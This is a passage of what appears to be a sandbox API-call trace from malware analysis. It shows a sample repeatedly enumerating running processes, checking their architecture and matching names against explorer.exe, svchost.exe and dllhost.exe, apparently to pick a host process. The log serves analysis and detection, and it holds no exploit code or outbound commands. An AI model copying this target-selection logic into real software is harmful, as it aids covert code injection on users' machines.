lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0172.498] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0172.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0172.498] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0172.499] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.499] CloseHandle (hObject=0xd8) returned 1 [0172.499] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0172.499] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.499] CloseHandle (hObject=0xd8) returned 1 [0172.500] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0172.500] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0172.500] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.500] CloseHandle (hObject=0xd8) returned 1 [0172.500] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.501] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0172.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x968) returned 0xd8 [0172.501] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.501] CloseHandle (hObject=0xd8) returned 1 [0172.501] lstrcmpiA (lpString1="regsvr32.exe", lpString2="explorer.exe") returned 1 [0172.501] lstrcmpiA (lpString1="regsvr32.exe", lpString2="svchost.exe") returned -1 [0172.501] lstrcmpiA (lpString1="regsvr32.exe", lpString2="dllhost.exe") returned 1 [0172.501] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 0 [0172.502] CloseHandle (hObject=0xd4) returned 1 [0172.502] Sleep (dwMilliseconds=0x3e8) [0173.517] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0173.519] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0173.520] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0173.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0173.520] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0173.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0173.521] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0173.521] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0173.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0173.522] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0173.522] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0173.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0173.523] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0173.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0173.523] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0173.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0173.524] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0173.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0173.524] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0173.525] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0173.525] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0173.526] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0173.526] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0173.527] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0173.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0173.528] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0173.528] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0173.529] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0173.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0173.529] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.529] CloseHandle (hObject=0xd8) returned 1 [0173.529] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0173.529] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0173.529] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0173.529] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0173.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0173.530] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0173.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0173.530] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.530] CloseHandle (hObject=0xd8) returned 1 [0173.530] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0173.530] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0173.530] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0173.530] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0173.531] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0173.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0173.531] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0173.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0173.532] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.532] CloseHandle (hObject=0xd8) returned 1 [0173.532] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0173.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0173.533] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.533] CloseHandle (hObject=0xd8) returned 1 [0173.533] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0173.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0173.533] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.533] CloseHandle (hObject=0xd8) returned 1 [0173.533] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0173.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0173.534] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.534] CloseHandle (hObject=0xd8) returned 1 [0173.534] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0173.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0173.534] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.534] CloseHandle (hObject=0xd8) returned 1 [0173.534] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0173.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0173.535] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.535] CloseHandle (hObject=0xd8) returned 1 [0173.535] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0173.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0173.535] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.535] CloseHandle (hObject=0xd8) returned 1 [0173.536] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0173.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0173.536] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.536] CloseHandle (hObject=0xd8) returned 1 [0173.536] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0173.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0173.537] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.537] CloseHandle (hObject=0xd8) returned 1 [0173.537] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0173.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0173.537] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.537] CloseHandle (hObject=0xd8) returned 1 [0173.537] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0173.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0173.538] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.538] CloseHandle (hObject=0xd8) returned 1 [0173.538] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0173.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0173.538] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.538] CloseHandle (hObject=0xd8) returned 1 [0173.538] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0173.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0173.539] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.539] CloseHandle (hObject=0xd8) returned 1 [0173.539] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0173.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0173.540] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.540] CloseHandle (hObject=0xd8) returned 1 [0173.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0173.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0173.540] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.540] CloseHandle (hObject=0xd8) returned 1 [0173.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0173.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0173.541] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.541] CloseHandle (hObject=0xd8) returned 1 [0173.541] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0173.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0173.541] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.541] CloseHandle (hObject=0xd8) returned 1 [0173.541] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0173.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0173.542] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.542] CloseHandle (hObject=0xd8) returned 1 [0173.542] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0173.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0173.543] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.543] CloseHandle (hObject=0xd8) returned 1 [0173.543] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0173.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0173.543] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.543] CloseHandle (hObject=0xd8) returned 1 [0173.543] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0173.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0173.544] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0173.544] CloseHandle (hObject=0xd8) returned 1 [0173.544] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.544] OpenProcess 